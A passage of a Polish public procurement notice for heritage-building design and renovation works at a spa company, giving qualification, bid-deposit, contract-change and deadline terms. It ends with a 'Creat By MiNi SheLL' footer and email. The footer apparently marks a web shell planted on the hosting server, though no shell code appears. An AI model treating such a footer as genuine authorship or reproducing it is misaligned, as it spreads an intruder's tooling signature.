których dotyczyły prace projektowe)<br/>Zamawiający dopuszcza możliwość potwierdzenia spełniania warunku dot. dysponowania odpowiednimi osobami również<br/>poprzez wykazanie posiadania wymaganych uprawnień wydanych na podstawie wcześniej obowiązujących niż obecnie<br/>przepisów oraz odpowiadające im uprawnienia wydane Obywatelom państw członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy<br/>o Europejskim Obszarze Gospodarczym oraz innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>Dla zadania 2:<br/>a) Zamawiający wymaga wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że wykonał min. 1 robotę a max. 2 roboty o wartości<br/>sumarycznej nie niższej niż 1 000 000 zł brutto, przy czym wymagane jest wykazanie roboty/robót podobnego rodzaju, tj.<br/>obejmujących roboty wykonane na obiekcie/obiektach wpisanym do rejestru zabytków (każda wykazana robota) oraz<br/>zawierającą/zawierające nast. elementy: remont/wykonanie elewacji, remont/wykonanie stolarki okiennej lub drzwiowej oraz<br/>wykonanie izolacji murów,<br/>b) Zamawiający wymaga wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże że będzie dysponował następującymi osobami<br/>skierowanymi do realizacji zamówienia (zał. nr 8 do SWZ):<br/> Kierownik budowy: posiadający ważne uprawnienia do kierowania robotami w branży konstrukcyjno-budowlanej lub<br/>równoważnej bez ograniczeń oraz spełniającym wymagania z art. 37c Ustawy o ochronie zabytków i opiece nad zabytkami z<br/>dnia 23 lipca 2003 r. (Dz.U. 2003 Nr 162, poz. 1568 z późn. zm.), zgodnie z którym robotami budowlanymi przy zabytkach<br/>nieruchomych wpisanych do rejestru kieruje osoba, która posiada uprawnienia budowlane określone przepisami Prawa budowlanego oraz która przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach<br/>nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury.<br/> Osoba uprawniona do kierowania pracami konserwatorskimi, pracami restauratorskimi lub badaniami konserwatorskimi,<br/>prowadzonymi przy zabytkach wpisanych do rejestru posiadającą wykształcenie i doświadczenie wymagane zgodnie z art.<br/>37a ust 1 i 2 obowiązującej Ustawy o ochronie zabytków i opiece nad zabytkami.<br/>Uwaga: Zamawiający uzna także za spełnienie powyższego warunku sytuację, gdzie jedna osoba spełnia oba powyższe<br/>wymogi.<br/>Zamawiający dopuszcza możliwość potwierdzenia spełniania warunku dot. dysponowania odpowiednimi osobami również<br/>poprzez wykazanie posiadania wymaganych uprawnień wydanych na podstawie wcześniej obowiązujących niż obecnie<br/>przepisów oraz odpowiadające im uprawnienia wydane Obywatelom państw członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o<br/>Europejskim Obszarze Gospodarczym oraz innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dla<br/>zadania 1:<br/>a) Zamawiający wymaga wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz<br/>załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi<br/>zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże wykonanie min. 1 usługi projektowej podobnego rodzaju do<br/>usługi objętej zadaniem 1, tj. zawierającej minimum takie elementy projektowe jak elewacja, stolarka okienna lub drzwiowa i izolacja<br/>murów o wartości min. 50 000 zł, dotyczącej obiektu wpisanego do rejestru zabytków.<br/>b) Zamawiający wymaga wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że będzie dysponował następującymi osobami skierowanymi do<br/>realizacji zamówienia(zał. nr 8 do SWZ):<br/>1. Projektant branży architektonicznej - 1 osoba posiadająca uprawnienia do projektowania w specjalności architektonicznej bez<br/>ograniczeń, z doświadczeniem w projektowaniu dot. obiektów zabytkowych (należy wykazać min. 2 obiekty zabytkowe, których<br/>dotyczyły prace projektowe)<br/>2. Osoba sprawdzającą branży architektonicznej - 1 osoba posiadająca uprawnienia do projektowania w specjalności<br/>architektonicznej bez ograniczeń, z doświadczeniem w projektowaniu dot. obiektów zabytkowych (należy wykazać min. 2 obiekty<br/>zabytkowe których dotyczyły prace projektowe)<br/>Zamawiający dopuszcza możliwość potwierdzenia spełniania warunku dot. dysponowania odpowiednimi osobami również poprzez<br/>wykazanie posiadania wymaganych uprawnień wydanych na podstawie wcześniej obowiązujących niż obecnie przepisów oraz<br/>odpowiadające im uprawnienia wydane Obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw<br/>członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy<br/>o Europejskim Obszarze Gospodarczym oraz innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>(ze względu na ograniczoną ilość znaków - pozostałe informacje znajdują się w wiadomościach dodatkowych lub zmianach<br/>ogłoszenia)</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia i zobowiązania opisane w SWZ - adekwatnie do potrzeby.<br/>Pełnomocnictwo - jeśli wymagane na podstawie obowiązujących przepisów <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w<br/>kwocie: 10 000 (słownie: dziesięć tysięcy zł).<br/>2. Wadium musi obejmować pełen okres związania ofertą. Przy wnoszeniu wadium prosimy zaznaczyć czego dotyczy<br/>(sprawa ZP 36/2024) Wadium może być wniesione w jednej lub kilku następujących formach:<br/>- Pieniądzu: wymaganą kwotę należy wpłacić przelewem na rachunek bankowy w banku ING Bank Śląski SA o/Wałbrzych<br/>nr 83 1050 1908 1000 0022 4367 3353<br/>- Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert<br/>(decyduje data wpływu na rachunek bankowy zamawiającego);<br/>- gwarancjach bankowych;<br/>- gwarancjach ubezpieczeniowych;<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu<br/>Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu.<br/>5. W przypadku wnoszenia przez wykonawcę wadium w formie gwarancji/poręczenia, gwarancja/poręczenie powinny być<br/>sporządzone zgodnie z obowiązującym prawem i zawierać następujące elementy:<br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie<br/>ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Zamawiający Uzdrowisko Szczawno-Jedlina<br/>S.A.,<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta, do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie<br/>zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Prawo Zamówień Publicznych.<br/>6. W przypadku gdy wykonawca nie wniósł wadium lub wniósł je w sposób nieprawidłowy, lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą bądź złożył wniosek o zwrot wadium w przypadku, o którym mowa w art.<br/>98 ust. 2 pkt 3 ustawy Prawo Zamówień Publicznych, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy<br/>Prawo Zamówień Publicznych.<br/>7. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Prawo Zamówień Publicznych.<br/>8. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Prawo Zamówień Publicznych <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty. Dokument pełnomocnictwa powinien zostać podpisany przez<br/>wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym Wykonawcę pełnomocnika.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy<br/>1. Zamawiający dopuszcza zmiany postanowień zawartej Umowy w zakresie usług projektowych, tj:<br/>1) zmian dokumentacji lub elementów składowych przedmiotu zamówienia przy zachowaniu ceny nie wyższej w<br/>przypadkach korzystnych dla Zamawiającego np. ze względu na zastosowanie rozwiązań nowszych, lepszych itd., w tym<br/>także wynikających z przepisów prawa i zmian w tym obrębie,<br/>2) zmiany terminu wykonania zamówienia ze względu na organizacyjną działalność Zamawiającego lub inne nie dające się<br/>przewidzieć przyczyny o charakterze obiektywnym niezależne od wykonawcy np. działanie siły wyższej,<br/>3) ceny usługi brutto, w przypadku zmiany powszechnie obowiązujących stawek podatku VAT,<br/>4) miejsca dostawy dokumentacji będącej częścią przedmiotu zamówienia,<br/>5) sposobu rozliczania w zakresie np. sposobu wystawiania faktur VAT za wykonane usługi,<br/>6) zmian w zakresie podwykonawców, o ile są dopuszczone przepisami prawa.<br/>2. Zamawiający dopuszcza zmiany postanowień zawartej Umowy w zakresie robót budowlanych, tj:<br/>1) wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową w sytuacji, gdy wykonanie tych<br/>robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu Umowy i nie spowoduje podniesienia kosztów;<br/>2) rezygnacji z wykonywania części (elementów) przedmiotu Umowy przewidzianych w dokumentacji projektowej w sytuacji,<br/>gdy ich wykonanie będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień<br/>odbioru robót przepisami, wykonania przedmiotu Umowy. Roboty takie nazywane są „robotami zaniechanymi”, a ich wartość<br/>nie może przekroczyć 20 % wartości umowy brutto;<br/>3) zmiany stawki podatku VAT w przypadku urzędowej zmiany stawki podatku VAT;<br/>4) zmiany formy rozliczania, np. co do ilości wystawionych faktur, jeśli będzie to akceptowalne dla Zamawiającego;<br/>5) zmiany formy prawnej Zamawiającego;<br/>6) terminu wykonania oraz przedmiotu zamówienia w niezbędnym zakresie, nie prowadzącym jednak do zwiększenia jego<br/>wielkości lub zakresu i pod warunkiem, że będą one korzystne dla Zmawiającego, o ile będzie to konieczne z uwagi na<br/>nieprzewidziane okoliczności, na które Wykonawca nie miał wpływu, np. ujawnienie błędów w dokumentacji;<br/>7) zamiany materiałów, przyjętych rozwiązań itp., pod warunkiem, że zmiany te będą korzystne dla Zamawiającego. Będą to<br/>przykładowo okoliczności:<br/>a) powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację<br/>i konserwację wykonanego przedmiotu umowy;<br/>b) powodujące poprawienie parametrów technicznych;<br/>c) wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany potrzeb Zamawiającego lub zmiany<br/>obowiązujących przepisów.<br/>d) zmiana producenta poszczególnych materiałów pod warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych<br/>materiałów.<br/>8) wszelkich zmian Umowy, o ile konieczność ich wprowadzenia będzie wynikała ze zmian<br/>w obowiązujących przepisach prawa;<br/>9) aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów;<br/>(dalszy ciąg w informacjach dodatkowych, ze względu na ograniczoną ilość znaków) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-03 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://szczawno-jedlina.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-03 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-02-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu c.d.:Dla<br/>zadania 2:<br/>a) Zamawiający wymaga wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że wykonał min. 1 robotę a max. 2 roboty o wartości<br/>sumarycznej nie niższej niż 1 000 000 zł brutto, przy czym wymagane jest wykazanie roboty/robót podobnego rodzaju, tj.<br/>obejmujących roboty wykonane na obiekcie/obiektach wpisanym do rejestru zabytków (każda wykazana robota) oraz<br/>zawierającą/zawierające nast. elementy: remont/wykonanie elewacji, remont/wykonanie stolarki okiennej lub drzwiowej oraz<br/>wykonanie izolacji murów,<br/>b) Zamawiający wymaga wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże że będzie dysponował następującymi osobami<br/>skierowanymi do realizacji zamówienia (zał. nr 8 do SWZ):<br/> Kierownikiem budowy: posiadającym ważne uprawnienia do kierowania robotami w branży konstrukcyjno-budowlanej lub<br/>równoważnej bez ograniczeń oraz spełniającym wymagania z art. 37c Ustawy o ochronie zabytków i opiece nad zabytkami z<br/>dnia 23 lipca 2003 r. (Dz.U. 2003 Nr 162, poz. 1568 z późn. zm.), zgodnie z którym robotami budowlanymi przy zabytkach<br/>nieruchomych wpisanych do rejestru kieruje osoba, która posiada uprawnienia budowlane określone przepisami Prawa budowlanego oraz która przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach<br/>nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury.<br/> Osobą uprawnioną do kierowania pracami konserwatorskimi, pracami restauratorskimi lub badaniami konserwatorskimi,<br/>prowadzonymi przy zabytkach wpisanych do rejestru posiadającą wykształcenie i doświadczenie wymagane zgodnie z art.<br/>37a ust 1 i 2 obowiązującej Ustawy o ochronie zabytków i opiece nad zabytkami.<br/>Uwaga: Zamawiający uzna także za spełnienie powyższego warunku sytuację, gdzie jedna osoba spełnia oba powyższe<br/>wymogi.<br/>Zamawiający dopuszcza możliwość potwierdzenia spełniania warunku dot. dysponowania odpowiednimi osobami również<br/>poprzez wykazanie posiadania wymaganych uprawnień wydanych na podstawie wcześniej obowiązujących niż obecnie<br/>przepisów oraz odpowiadające im uprawnienia wydane Obywatelom państw członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o<br/>Europejskim Obszarze Gospodarczym oraz innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.

Creat By MiNi SheLL
Email: jattceo@gmail.com